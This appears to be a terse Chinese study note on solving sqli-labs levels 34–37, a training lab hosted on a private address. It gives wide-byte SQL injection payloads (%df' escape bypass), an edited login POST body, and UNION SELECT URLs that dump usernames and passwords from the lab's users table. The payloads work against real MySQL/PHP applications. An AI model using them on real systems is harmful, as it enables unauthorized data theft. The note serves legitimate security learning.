less 34-37

less34

admin  admin

 

 

ad  ad

 

 

 

a%df’    a%df’   登录失败

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

a%df\'

uname=a%25df%5C%27&passwd=1111&submit=Submit

a%df%5C%27

删除25  改包后  再次执行一次

 

 

 

 

 

 

 

然后再修改包  猜列数

 

 

 

 

 

 

 

 

 

 

 

 也可以使用第二种方法      '   ------>   �'       这里的注释符只可以使用#

 

 

 

 

 

 

 

 

 

 

 

 

 

 

LESS35

 

 

 

 

 

 

 

这一关基本与上一关相同，就是没有了数据包裹，所以不用‘直接进行注入：

http://192.168.50.100/sqli-labs/Less-35/?id=111   union select 1,2,

      group_concat(concat_ws(0x7e,username,password)) from security.users

 

 

 

 

 

less36  使用宽字节注入

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://192.168.50.100/sqli-labs/Less-36/?id=11111%df'  union select 1,2,3  --+

 

 

 

http://192.168.50.100/sqli-labs/Less-36/?id=11111%df'  union select 1,2,

group_concat(concat_ws(0x7e,username,password)) from security.users  --+

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

less 37 

 

 

 

 

 

 

 

 

 

 

 

 

 

抓包